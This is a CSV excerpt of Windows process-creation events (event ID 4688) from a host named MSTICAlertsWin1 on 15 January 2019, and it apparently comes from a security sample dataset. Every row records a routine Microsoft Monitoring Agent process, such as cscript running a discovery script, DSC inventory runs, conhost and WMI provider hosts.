316,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x16d0,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:26.007
317,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:23:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11a8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:23:26.000
318,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:51:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x244,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:51:26.000
319,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1050,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:24.000
320,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\Windows\System32\conhost.exe,%%1936,0x1050,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:24.020
321,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:25.613,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:25.613
322,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:52:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1364,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:52:26.013
323,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:59:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1148,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:59:26.017
324,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10e0,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:24.003
325,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12fc,C:\Windows\System32\conhost.exe,%%1936,0x10e0,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:24.017
326,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:25.363,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x5cc,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:25.363
327,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:00:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x518,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:00:26.000
328,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:03:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xf84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:03:26.000
329,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd64,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:24.000
330,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\conhost.exe,%%1936,0xd64,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:24.020
331,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:25.837,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb50,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:25.837
332,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:04:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10a4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:04:26.007
333,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:01:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:01:26.007
334,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:01:52.640,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xe3c,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:01:52.640
335,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd64,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:24.000
336,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\conhost.exe,%%1936,0xd64,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:24.027
337,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:25.293,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10e0,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:25.293
338,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x108c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:26.003
339,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:28.260,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x28c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF-64\DesiredStateConfiguration\DscRun.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF-64/DesiredStateConfiguration\DscRun.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\work\Registry.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\work""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:28.260
340,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:02:28.270,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b4,C:\Windows\System32\conhost.exe,%%1936,0x28c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF-64\DesiredStateConfiguration\DscRun.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:02:28.270
341,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:55:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xddc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:55:26.000
342,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbe8,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:24.003
343,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x130c,C:\Windows\System32\conhost.exe,%%1936,0xbe8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:24.020
344,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:25.490,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1040,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:25.490
345,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:56:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1370,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:56:26.000
346,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:53:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x8e4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:53:26.000
347,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10fc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:24.003
348,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1298,C:\Windows\System32\conhost.exe,%%1936,0x10fc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:24.020
349,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:25.557,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x7f8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:25.557
350,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:54:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xf94,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:54:26.007
351,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:57:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:57:26.000
352,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa84,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:24.013
353,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1348,C:\Windows\System32\conhost.exe,%%1936,0xa84,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:24.030
354,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:25.427,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xe34,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:25.427
355,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:58:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:58:26.010
356,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:45:24.523,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b4,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe"" -PerfMode optimize -quickscan -event -json -alldetectors",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:45:24.523
357,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:45:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1148,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:45:26.007
358,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:45:28.157,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xde8,C:\Windows\System32\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e5,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:45:28.157
359,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc08,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:24.017
360,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:24.033,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1338,C:\Windows\System32\conhost.exe,%%1936,0xc08,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:24.033
361,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:25.800,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:25.800
362,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:46:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6d4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:46:26.007